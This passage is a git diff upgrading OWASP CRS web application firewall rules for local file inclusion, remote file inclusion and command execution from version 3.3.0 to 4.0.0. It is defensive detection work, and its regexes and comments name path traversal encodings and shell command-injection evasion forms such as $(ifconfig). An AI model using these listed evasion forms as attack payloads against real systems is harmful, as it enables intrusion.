-\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*$" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used (see: https://www.rfc-editor.org/rfc/rfc7578#section-4.7) +# Note: this is in phase:2 because these are headers that come in the body +SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \ + "id:922120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used',\ + logdata:'Matched Data: %{TX.0}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-deprecated-header',\ + tag:'OWASP_CRS',\ + tag:'capec/272/220',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf index 31d9f7fcb9..a1fd3e0110 100644 --- a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +++ b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # @@ -26,13 +27,18 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAf # # [ Encoded /../ Payloads ] # -SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?i)(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8|e)0%80%ae|2(?:(?:5(?:c0%25a|2))?e|%45)|u(?:(?:002|ff0)e|2024)|%32(?:%(?:%6|4)5|E)|c0(?:%[256aef]e|\.))|\.(?:%0[01]|\?)?|\?\.?|0x2e){2}(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))" \ +# Regular expression generated from regex-assembly/930100.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 930100 +# +SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "@rx (?i)(?:[/\x5c]|%(?:2(?:f|5(?:2f|5c|c(?:1%259c|0%25af))|%46)|5c|c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|(?:bg%q|(?:e|f(?:8%8)?0%8)0%80%a)f|u(?:221[5-6]|EFC8|F025|002f)|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|1u)|0x(?:2f|5c))(?:\.(?:%0[0-1]|\?)?|\?\.?|%(?:2(?:(?:5(?:2|c0%25a))?e|%45)|c0(?:\.|%[25-6ae-f]e)|u(?:(?:ff0|002)e|2024)|%32(?:%(?:%6|4)5|E)|(?:e|f(?:(?:8|c%80)%8)?0%8)0%80%ae)|0x2e){2,3}(?:[/\x5c]|%(?:2(?:f|5(?:2f|5c|c(?:1%259c|0%25af))|%46)|5c|c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|(?:bg%q|(?:e|f(?:8%8)?0%8)0%80%a)f|u(?:221[5-6]|EFC8|F025|002f)|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|1u)|0x(?:2f|5c))" \ "id:930100,\ phase:2,\ block,\ capture,\ t:none,\ - msg:'Path Traversal Attack (/../)',\ + msg:'Path Traversal Attack (/../) or (/.../)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ @@ -41,21 +47,30 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@r tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" # -# [ Decoded /../ Payloads ] +# [ Decoded /../ or /..;/ Payloads ] +# +# To prevent '..' from triggering, the regexp is split into two parts: +# - ../ +# - /.. +# OR +# - .../ +# - /... +# +# Semicolon added to prevent path traversal via reverse proxy mapping '/..;/' (Tomcat) # -SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?:^|[\\/])\.\.(?:[\\/]|$)" \ +SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "@rx (?:(?:^|[\x5c/;])\.{2,3}[\x5c/;]|[\x5c/;]\.{2,3}(?:[\x5c/;]|$))" \ "id:930110,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\ - msg:'Path Traversal Attack (/../)',\ + msg:'Path Traversal Attack (/../) or (/.../)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ @@ -64,23 +79,27 @@ SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (? tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ multiMatch,\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" # # -=[ OS File Access ]=- # +# We check for OS file access with the help of a local file with OS files data. +# # Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml # +# If you wonder where support for Google OAuth2 has gone, see: +# https://github.com/coreruleset/google-oauth2-plugin SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile lfi-os-files.data" \ "id:930120,\ phase:2,\ block,\ capture,\ - t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,\ msg:'OS File Access Attempt',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -91,10 +110,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ tag:'PCI/6.5.4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ Restricted File Access ]=- @@ -104,10 +123,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \ "id:930130,\ - phase:2,\ + phase:1,\ block,\ capture,\ - t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,\ msg:'Restricted File Access Attempt',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -118,33 +137,62 @@ SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ tag:'PCI/6.5.4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # +# +# -=[ OS File Access ]=- +# +# This is a stricter sibling of rule 930120. +# This stricter sibling checks for OS file data in request headers referer and user-agent. +# We check for OS file access with the help of a local file with OS files data. +# +# Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml +# +SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@pmFromFile lfi-os-files.data" \ + "id:930121,\ + phase:1,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,\ + msg:'OS File Access Attempt in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + tag:'PCI/6.5.4',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf index e5fbfe9951..6fc1f28c6f 100644 --- a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf +++ b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -16,10 +17,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # -=[ Rule Logic ]=- @@ -33,7 +34,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAf # http://projects.webappsec.org/Remote-File-Inclusion # http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html # -SecRule ARGS "@rx ^(?i:file|ftps?|https?):\/\/(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ +SecRule ARGS "@rx ^(?i:file|ftps?|https?)://(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ "id:931100,\ phase:2,\ block,\ @@ -48,13 +49,12 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?):\/\/(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1 tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(?:file|ftps?|https?):\/\/" \ +SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(?:file|ftps?|https?)://" \ "id:931110,\ phase:2,\ block,\ @@ -69,11 +69,10 @@ SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_abso tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ "id:931120,\ @@ -90,21 +89,31 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule ARGS "@rx ^(?i:file|ftps?|https?)://([^/]*).*$" \ +# url:file:// can be used by Java applications using +# org.apache.commons.io.IOUtils to access internal files, so this has been added +# +# This rule has one (stricter) sibling: 931131. +# That rule applies the same regular expression to the request filename in phase 1. +# +# Regular expression generated from regex-assembly/931130.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 931130 +# +SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[^@]+@)?([^/]*)" \ "id:931130,\ phase:2,\ block,\ @@ -119,29 +128,57 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?)://([^/]*).*$" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ chain" SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" +# This is a (stricter) sibling of 931130. +# +# Regular expression generated from regex-assembly/931131.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 931131 +# +SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[^@]+@)?([^/]*)" \ + "id:931131,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ + chain" + SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ + "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf index 656fd6fde2..45f3ca6225 100644 --- a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf +++ b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -49,7 +50,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAf # \n ;\nifconfig # \r ;\rifconfig # \$\( $(ifconfig) -# $\(\( $((ifconfig)) +# \$\(\( $((ifconfig)) # ` `ifconfig` # \${ ${ifconfig} # <\( <( ifconfig ) @@ -71,9 +72,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAf # # 4. Paths # -# [\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/ /sbin/ifconfig, /s?in/./ifconfig, /s[a-b]in/ifconfig etc. -# -# This rule is case-sensitive to prevent FP ("Cat" vs. "cat"). +# [\?\*\[\]\(\)\-\|+\w'\"\./\x5c]+/ /sbin/ifconfig, /s?in/./ifconfig, /s[a-b]in/ifconfig etc. # # An effort was made to combat evasions by shell quoting (e.g. 'ls', # 'l'"s", \l\s are all valid). ModSecurity has a t:cmdLine @@ -82,30 +81,50 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAf # useful for this case. However, emulating the transformation makes # 